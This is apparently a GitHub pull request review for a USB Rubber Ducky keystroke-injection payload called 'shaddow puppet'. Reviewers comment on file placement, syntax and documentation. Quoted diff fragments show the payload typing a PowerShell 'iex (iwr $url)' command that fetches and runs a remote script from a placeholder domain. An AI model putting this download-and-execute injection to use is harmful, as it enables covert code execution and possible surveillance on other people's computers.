shaddow puppet #537
shaddow puppet #537
Conversation
There was a problem hiding this comment.
This is in the incorrect your payload.txt file should be placed within payloads/library/CATEGORY/PAYLOAD/playload.txt
If your category is remote access, then your payload should be placed in
payloads/library/incident_response/Shadowpuppet/payload.txt
| STRING LISTEN_PORT | ||
| STRING ";$url='" | ||
| STRING REMOTE_PS_URL | ||
| STRING "';iex (iwr $url).Content" |
There was a problem hiding this comment.
You can compress this STRING ENTER into one line by using STRINGLN
STRINGLN "';iex (iwr $url).Content"
|
|
||
| REM ─── CONFIG ─────────────────────────────────────── | ||
| DEFINE EXECUTE_PAYLOAD TRUE | ||
| DEFINE REMOTE_PS_URL https://yourdomain.com/streamer/stream.ps1 |
There was a problem hiding this comment.
Please include a readme.md explaining your payload and its configurations so the end user has a better understanding of what the payload is doing and what needs to be they need change.
|
This seems to be a duplicate PR? Please close your other PR |
|
|
||
| ATTACKMODE HID | ||
| LED_OFF | ||
| DELAY 500 |
There was a problem hiding this comment.
If your target machine is windows, consider using EXTENSION PASSIVE_WINDOWS_DETECT this allows the Ducky to dynamically determine when the target machine is accepting keystrokes removing the need for a long start delay.
No description provided.